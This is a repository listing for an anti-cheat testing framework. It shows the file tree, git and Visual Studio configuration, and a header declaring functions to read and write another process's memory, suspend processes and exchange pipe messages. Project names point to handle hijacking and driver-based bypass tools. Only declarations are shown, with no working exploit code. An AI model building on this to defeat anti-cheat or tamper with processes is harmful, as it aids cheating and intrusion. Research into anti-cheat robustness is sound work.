├── .gitattributes ├── .gitignore ├── .gitmodules ├── AntiCheat-Testing-Framework.sln ├── CheatHelper ├── CheatHelper.cpp ├── CheatHelper.h ├── CheatHelper.vcxproj ├── CheatHelper.vcxproj.filters ├── Readme.md ├── ZwReadWriteVM.asm ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── DriverDisabler ├── DriverDisabler.cpp ├── DriverDisabler.vcxproj ├── DriverDisabler.vcxproj.filters ├── README.md ├── pch.cpp └── pch.h ├── DriverHelper ├── DriverHelper.cpp ├── DriverHelper.h ├── DriverHelper.vcxproj ├── DriverHelper.vcxproj.filters ├── Readme.md ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── DriverTester ├── DriverTester.cpp ├── DriverTester.vcxproj ├── DriverTester.vcxproj.filters ├── LoadDriver.bat ├── Readme.md ├── pch.cpp └── pch.h ├── ExternalCheatDriver ├── ExternalCheatDriver.cpp ├── ExternalCheatDriver.vcxproj ├── HandleElevationDriver.vcxproj.filters ├── LoadDriver.bat ├── Readme.md ├── pch.cpp └── pch.h ├── HandleElevationDriver ├── HandleElevationDriver.cpp ├── HandleElevationDriver.vcxproj ├── HandleElevationDriver.vcxproj.filters ├── LoadDriver.bat ├── Readme.md ├── pch.cpp └── pch.h ├── HandleHijackingDLL ├── HandleHijackingDLL.cpp ├── HandleHijackingDLL.vcxproj ├── HandleHijackingDLL.vcxproj.filters ├── README.md ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── HandleHijackingMaster ├── HandleHijackingMaster.cpp ├── HandleHijackingMaster.vcxproj ├── HandleHijackingMaster.vcxproj.filters ├── README.md ├── pch.cpp └── pch.h ├── README.md ├── StealthHijackingNormalDLL ├── Readme.md ├── StealthHijackingNormalDLL.cpp ├── StealthHijackingNormalDLL.vcxproj ├── StealthHijackingNormalDLL.vcxproj.filters ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── StealthHijackingNormalMaster ├── Readme.md ├── StealthHijackingNormalMaster.cpp ├── StealthHijackingNormalMaster.vcxproj ├── StealthHijackingNormalMaster.vcxproj.filters ├── pch.cpp └── pch.h ├── config.ini └── resources └── MinHook ├── include └── MinHook.h └── lib └── libMinHook-x64-v141-mdd.lib /.gitattributes: 
-------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 
42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 
125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 
159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. 
Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc 262 | 263 | # IDA Files 264 | *.id0 265 | *.id1 266 | *.nam 267 | *.til 268 | *.i64 269 | 270 | # Libs and Drivers and back up files 271 | config.ini_apex 272 | config.ini_bdo 273 | *.sys 274 | /resources/gdrv.sys 275 | /resources/rzpnk.sys 276 | /resources/gdrv.i64 277 | /resources/rzpnk.i64 278 | /resources/rzpnk.id0 279 | /resources/rzpnk.id1 280 | /resources/rzpnk.nam 281 | /resources/rzpnk.til 282 | /resources/rzpnk_20190322115842.i64 283 | /resources/MinHook/lib/libMinHook-x86-v90-mtd.lib 284 | /resources/MinHook/lib/libMinHook-x86-v90-mt.lib 285 | /resources/MinHook/lib/libMinHook-x86-v90-mdd.lib 286 | /resources/MinHook/lib/libMinHook-x86-v90-md.lib 287 | /resources/MinHook/lib/libMinHook-x86-v141-mtd.lib 288 | /resources/MinHook/lib/libMinHook-x86-v141-mt.lib 289 | 
/resources/MinHook/lib/libMinHook-x86-v141-mdd.lib 290 | /resources/MinHook/lib/libMinHook-x86-v141-md.lib 291 | /resources/MinHook/lib/libMinHook-x86-v140-mtd.lib 292 | /resources/MinHook/lib/libMinHook-x86-v140-mt.lib 293 | /resources/MinHook/lib/libMinHook-x86-v140-mdd.lib 294 | /resources/MinHook/lib/libMinHook-x86-v140-md.lib 295 | /resources/MinHook/lib/libMinHook-x86-v120-mtd.lib 296 | /resources/MinHook/lib/libMinHook-x86-v120-mt.lib 297 | /resources/MinHook/lib/libMinHook-x86-v120-mdd.lib 298 | /resources/MinHook/lib/libMinHook-x86-v120-md.lib 299 | /resources/MinHook/lib/libMinHook-x86-v110-mtd.lib 300 | /resources/MinHook/lib/libMinHook-x86-v110-mt.lib 301 | /resources/MinHook/lib/libMinHook-x86-v110-mdd.lib 302 | /resources/MinHook/lib/libMinHook-x86-v110-md.lib 303 | /resources/MinHook/lib/libMinHook-x86-v100-mtd.lib 304 | /resources/MinHook/lib/libMinHook-x86-v100-mt.lib 305 | /resources/MinHook/lib/libMinHook-x86-v100-mdd.lib 306 | /resources/MinHook/lib/libMinHook-x86-v100-md.lib 307 | /resources/MinHook/lib/libMinHook-x64-v90-mtd.lib 308 | /resources/MinHook/lib/libMinHook-x64-v90-mt.lib 309 | /resources/MinHook/lib/libMinHook-x64-v90-mdd.lib 310 | /resources/MinHook/lib/libMinHook-x64-v90-md.lib 311 | /resources/MinHook/lib/libMinHook-x64-v141-mtd.lib 312 | /resources/MinHook/lib/libMinHook-x64-v141-mt.lib 313 | /resources/MinHook/lib/libMinHook-x64-v141-md.lib 314 | /resources/MinHook/lib/libMinHook-x64-v140-mtd.lib 315 | /resources/MinHook/lib/libMinHook-x64-v140-mt.lib 316 | /resources/MinHook/lib/libMinHook-x64-v140-mdd.lib 317 | /resources/MinHook/lib/libMinHook-x64-v140-md.lib 318 | /resources/MinHook/lib/libMinHook-x64-v120-mtd.lib 319 | /resources/MinHook/lib/libMinHook-x64-v120-mt.lib 320 | /resources/MinHook/lib/libMinHook-x64-v120-mdd.lib 321 | /resources/MinHook/lib/libMinHook-x64-v120-md.lib 322 | /resources/MinHook/lib/libMinHook-x64-v110-mtd.lib 323 | /resources/MinHook/lib/libMinHook-x64-v110-mt.lib 324 | 
/resources/MinHook/lib/libMinHook-x64-v110-mdd.lib 325 | /resources/MinHook/lib/libMinHook-x64-v110-md.lib 326 | /resources/MinHook/lib/libMinHook-x64-v100-mtd.lib 327 | /resources/MinHook/lib/libMinHook-x64-v100-mt.lib 328 | /resources/MinHook/lib/libMinHook-x64-v100-mdd.lib 329 | /resources/MinHook/lib/libMinHook-x64-v100-md.lib 330 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "LuaHook"] 2 | path = LuaHook 3 | url = https://github.com/niemand-sec/LuaHook.git 4 | branch = ACTF 5 | -------------------------------------------------------------------------------- /AntiCheat-Testing-Framework.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.168 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HandleHijackingDLL", "HandleHijackingDLL\HandleHijackingDLL.vcxproj", "{FA4A27D2-1F04-4DDA-A10C-D19640522328}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HandleHijackingMaster", "HandleHijackingMaster\HandleHijackingMaster.vcxproj", "{8B5D48FC-71B6-40DA-9415-64CF55DC29FF}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CheatHelper", "CheatHelper\CheatHelper.vcxproj", "{A080C117-D1DB-4671-8217-65496573BA4D}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DriverDisabler", "DriverDisabler\DriverDisabler.vcxproj", "{723D6B45-EEBA-4C09-8528-4373BAFF330A}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StealthHijackingNormalMaster", "StealthHijackingNormalMaster\StealthHijackingNormalMaster.vcxproj", "{F74258DB-52A4-4B60-8FBE-385091D35DCA}" 15 | EndProject 16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = 
"StealthHijackingNormalDLL", "StealthHijackingNormalDLL\StealthHijackingNormalDLL.vcxproj", "{09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DriverTester", "DriverTester\DriverTester.vcxproj", "{D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}" 19 | EndProject 20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HandleElevationDriver", "HandleElevationDriver\HandleElevationDriver.vcxproj", "{97D0792B-4385-450B-9E85-79494037D730}" 21 | EndProject 22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DriverHelper", "DriverHelper\DriverHelper.vcxproj", "{36244BA2-D910-4746-8ED2-7CFA55FB4DE9}" 23 | EndProject 24 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExternalCheatDriver", "ExternalCheatDriver\ExternalCheatDriver.vcxproj", "{99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}" 25 | EndProject 26 | Global 27 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 28 | Debug|x64 = Debug|x64 29 | Debug|x86 = Debug|x86 30 | Release|x64 = Release|x64 31 | Release|x86 = Release|x86 32 | EndGlobalSection 33 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 34 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x64.ActiveCfg = Debug|x64 35 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x64.Build.0 = Debug|x64 36 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x86.ActiveCfg = Debug|Win32 37 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Debug|x86.Build.0 = Debug|Win32 38 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x64.ActiveCfg = Release|x64 39 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x64.Build.0 = Release|x64 40 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x86.ActiveCfg = Release|Win32 41 | {FA4A27D2-1F04-4DDA-A10C-D19640522328}.Release|x86.Build.0 = Release|Win32 42 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x64.ActiveCfg = Debug|x64 43 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x64.Build.0 = Debug|x64 44 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x86.ActiveCfg = Debug|Win32 45 
| {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Debug|x86.Build.0 = Debug|Win32 46 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x64.ActiveCfg = Release|x64 47 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x64.Build.0 = Release|x64 48 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x86.ActiveCfg = Release|Win32 49 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF}.Release|x86.Build.0 = Release|Win32 50 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x64.ActiveCfg = Debug|x64 51 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x64.Build.0 = Debug|x64 52 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x86.ActiveCfg = Debug|Win32 53 | {A080C117-D1DB-4671-8217-65496573BA4D}.Debug|x86.Build.0 = Debug|Win32 54 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x64.ActiveCfg = Release|x64 55 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x64.Build.0 = Release|x64 56 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x86.ActiveCfg = Release|Win32 57 | {A080C117-D1DB-4671-8217-65496573BA4D}.Release|x86.Build.0 = Release|Win32 58 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x64.ActiveCfg = Debug|x64 59 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x64.Build.0 = Debug|x64 60 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x86.ActiveCfg = Debug|Win32 61 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Debug|x86.Build.0 = Debug|Win32 62 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x64.ActiveCfg = Release|x64 63 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x64.Build.0 = Release|x64 64 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x86.ActiveCfg = Release|Win32 65 | {723D6B45-EEBA-4C09-8528-4373BAFF330A}.Release|x86.Build.0 = Release|Win32 66 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x64.ActiveCfg = Debug|x64 67 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x64.Build.0 = Debug|x64 68 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x86.ActiveCfg = Debug|Win32 69 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Debug|x86.Build.0 = Debug|Win32 70 | 
{F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x64.ActiveCfg = Release|x64 71 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x64.Build.0 = Release|x64 72 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x86.ActiveCfg = Release|Win32 73 | {F74258DB-52A4-4B60-8FBE-385091D35DCA}.Release|x86.Build.0 = Release|Win32 74 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x64.ActiveCfg = Debug|x64 75 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x64.Build.0 = Debug|x64 76 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x86.ActiveCfg = Debug|Win32 77 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Debug|x86.Build.0 = Debug|Win32 78 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x64.ActiveCfg = Release|x64 79 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x64.Build.0 = Release|x64 80 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x86.ActiveCfg = Release|Win32 81 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE}.Release|x86.Build.0 = Release|Win32 82 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x64.ActiveCfg = Debug|x64 83 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x64.Build.0 = Debug|x64 84 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x86.ActiveCfg = Debug|Win32 85 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Debug|x86.Build.0 = Debug|Win32 86 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x64.ActiveCfg = Release|x64 87 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x64.Build.0 = Release|x64 88 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x86.ActiveCfg = Release|Win32 89 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11}.Release|x86.Build.0 = Release|Win32 90 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x64.ActiveCfg = Debug|x64 91 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x64.Build.0 = Debug|x64 92 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x86.ActiveCfg = Debug|Win32 93 | {97D0792B-4385-450B-9E85-79494037D730}.Debug|x86.Build.0 = Debug|Win32 94 | {97D0792B-4385-450B-9E85-79494037D730}.Release|x64.ActiveCfg = Release|x64 95 | 
{97D0792B-4385-450B-9E85-79494037D730}.Release|x64.Build.0 = Release|x64 96 | {97D0792B-4385-450B-9E85-79494037D730}.Release|x86.ActiveCfg = Release|Win32 97 | {97D0792B-4385-450B-9E85-79494037D730}.Release|x86.Build.0 = Release|Win32 98 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x64.ActiveCfg = Debug|x64 99 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x64.Build.0 = Debug|x64 100 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x86.ActiveCfg = Debug|Win32 101 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Debug|x86.Build.0 = Debug|Win32 102 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x64.ActiveCfg = Release|x64 103 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x64.Build.0 = Release|x64 104 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x86.ActiveCfg = Release|Win32 105 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9}.Release|x86.Build.0 = Release|Win32 106 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x64.ActiveCfg = Debug|x64 107 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x64.Build.0 = Debug|x64 108 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x86.ActiveCfg = Debug|Win32 109 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Debug|x86.Build.0 = Debug|Win32 110 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x64.ActiveCfg = Release|x64 111 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x64.Build.0 = Release|x64 112 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x86.ActiveCfg = Release|Win32 113 | {99F47B02-FAAF-4C0D-9D9B-DFAD35E1F38B}.Release|x86.Build.0 = Release|Win32 114 | EndGlobalSection 115 | GlobalSection(SolutionProperties) = preSolution 116 | HideSolutionNode = FALSE 117 | EndGlobalSection 118 | GlobalSection(ExtensibilityGlobals) = postSolution 119 | SolutionGuid = {4B354B9C-B814-457A-8FF5-722BFE9C944E} 120 | EndGlobalSection 121 | EndGlobal 122 | -------------------------------------------------------------------------------- /CheatHelper/CheatHelper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 
// CheatHelper.h - declarations only: two fixed-size message records, the
// static-only CheatHelper class and the NamedPipeHelper class. The definitions
// are not part of this header.
//
// NOTE(review): the names of the two headers below were lost when this listing
// was extracted. The declarations need the Windows SDK types (HANDLE, DWORD,
// SIZE_T, LPTSTR, ...) and intptr_t - confirm the names against the repository.
#include
#include

// Size in bytes of every fixed char buffer declared in this header.
#define BUFSIZE 100
// NOTE(review): presumably the size of the file-mapping view; its use is not
// visible in this header.
#define FILEMAPSIZE 4096

// Function-pointer types for the native read/write virtual-memory calls; the
// status is returned as LONG.
// NOTE(review): the byte counts are declared ULONG / PULONG. If the native
// functions take SIZE_T / PSIZE_T on 64-bit Windows, a 4-byte out-parameter is
// too small for the value written back - verify before using these typedefs in
// an x64 build.
typedef LONG(WINAPI *TNtReadVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded);
typedef LONG(WINAPI *TNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);


// Request record with default member initialisers.
// NOTE(review): presumably exchanged over the named pipe or the file mapping;
// the code that fills and consumes it is not in this header.
// NOTE(review): `size` travels with the message while `buffer` is fixed at
// BUFSIZE bytes. A receiver has to reject size < 0 and size > BUFSIZE before
// using it as a copy length; whether it does is not visible here.
struct PipeMessageRequest {
    int action = 0;                 // request selector; values are defined by the consumer
    HANDLE handle = 0;              // handle value carried in the request
    intptr_t address = 0;           // address operand of the request
    int size = BUFSIZE;             // byte count, defaults to the full buffer
    char buffer[BUFSIZE] = { "" };  // payload, zero-initialised
};

// Response record paired with PipeMessageRequest by name.
struct PipeMessageResponse {
    int status = 0;                 // result code; meaning is defined by the producer
    SIZE_T bytesRead = 0;           // byte count reported back
    char buffer[BUFSIZE] = { "" };  // payload, zero-initialised
};

// Static-only helper: every member below is declared static, so the class is
// used without an instance. All state lives in the static data members.
class CheatHelper
{
public:
    // WINAPI Functions
    static void Suspend(DWORD processId);
    static void Resume(DWORD processId);
    // Process Functions
    static DWORD GetProcId(char* procName);
    // Debugging Functions
    static void ConsoleSetup(const char * title);
    static void PrintBytes(PVOID buffer, SIZE_T nSize);
    // Memory functions
    // The parameter lists mirror ReadProcessMemory / WriteProcessMemory and the
    // Nt*/Zw* virtual-memory calls; each returns int.
    // NOTE(review): the Nt*/Zw* variants take ULONG / PULONG byte counts, see
    // the note on the typedefs above.
    static int RPM(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
    static int WPM(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
    static int NtRVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded);
    static int NtWVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);
    static int ZwRVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded);
    static int ZwWVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);
    //DX functions
    //DX11 functions

    //FileMapping
    static bool checkSpinLockByte(LPVOID pFileMapMem, BYTE value);
    static bool setSpinLockByte(LPVOID pFileMapMem, BYTE value);
    static void prepareRequest(PipeMessageRequest &PMRequest);

    // Configuration file (INI)
    static bool loadConfig();

    //States
    static bool bDelayExecution;


    //Addresses
    // Each address is declared as a High / Low pair plus a combined value.
    // NOTE(review): how the three are related is not visible in this header.
